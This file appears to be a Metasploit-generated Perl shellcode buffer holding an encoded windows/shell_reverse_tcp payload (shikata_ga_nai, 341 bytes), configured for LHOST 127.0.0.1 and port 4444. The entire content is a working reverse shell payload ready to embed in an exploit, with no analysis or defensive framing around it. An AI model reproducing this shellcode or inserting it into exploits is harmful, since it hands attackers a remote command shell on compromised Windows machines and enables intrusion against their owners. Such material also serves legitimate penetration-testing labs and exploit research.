# windows/shell_reverse_tcp - 341 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, 
# EXITFUNC=process
our $buf = 
"\xdd\xc3\xba\x4f\x95\xbc\x94\x29\xc9\xd9\x74\x24\xf4\x5d" .
"\xb1\x4f\x31\x55\x19\x03\x55\x19\x83\xed\xfc\xad\x60\x40" .
"\x7c\xb8\x8b\xb9\x7d\xda\x02\x5c\x4c\xc8\x71\x14\xfd\xdc" .
"\xf2\x78\x0e\x97\x57\x69\x85\xd5\x7f\x9e\x2e\x53\xa6\x91" .
"\xaf\x52\x66\x7d\x73\xf5\x1a\x7c\xa0\xd5\x23\x4f\xb5\x14" .
"\x63\xb2\x36\x44\x3c\xb8\xe5\x78\x49\xfc\x35\x79\x9d\x8a" .
"\x06\x01\x98\x4d\xf2\xbb\xa3\x9d\xab\xb0\xec\x05\xc7\x9e" .
"\xcc\x34\x04\xfd\x31\x7e\x21\x35\xc1\x81\xe3\x04\x2a\xb0" .
"\xcb\xca\x15\x7c\xc6\x13\x51\xbb\x39\x66\xa9\xbf\xc4\x70" .
"\x6a\xbd\x12\xf5\x6f\x65\xd0\xad\x4b\x97\x35\x2b\x1f\x9b" .
"\xf2\x38\x47\xb8\x05\xed\xf3\xc4\x8e\x10\xd4\x4c\xd4\x36" .
"\xf0\x15\x8e\x57\xa1\xf3\x61\x68\xb1\x5c\xdd\xcc\xb9\x4f" .
"\x0a\x76\xe0\x07\xff\x44\x1b\xd8\x97\xdf\x68\xea\x38\x4b" .
"\xe7\x46\xb0\x55\xf0\xa9\xeb\x21\x6e\x54\x14\x51\xa6\x93" .
"\x40\x01\xd0\x32\xe9\xca\x20\xba\x3c\x5c\x71\x14\xef\x1c" .
"\x21\xd4\x5f\xf4\x2b\xdb\x80\xe4\x53\x31\xb7\x23\xc3\xc5" .
"\xc8\xab\x15\x52\xcb\xab\x04\xfe\x42\x4d\x4c\xee\x02\xc6" .
"\xf9\x97\x0e\x9c\x98\x58\x85\x34\x38\xca\x42\xc4\x37\xf7" .
"\xdc\x93\x10\xc9\x14\x71\x8d\x70\x8f\x67\x4c\xe4\xe8\x23" .
"\x8b\xd5\xf7\xaa\x5e\x61\xdc\xbc\xa6\x6a\x58\xe8\x76\x3d" .
"\x36\x46\x31\x97\xf8\x30\xeb\x44\x53\xd4\x6a\xa7\x64\xa2" .
"\x72\xe2\x12\x4a\xc2\x5b\x63\x75\xeb\x0b\x63\x0e\x11\xac" .
"\x8c\xc5\x91\xdc\xc6\x47\xb3\x74\x8f\x12\x81\x18\x30\xc9" .
"\xc6\x24\xb3\xfb\xb6\xd2\xab\x8e\xb3\x9f\x6b\x63\xce\xb0" .
"\x19\x83\x7d\xb0\x0b";
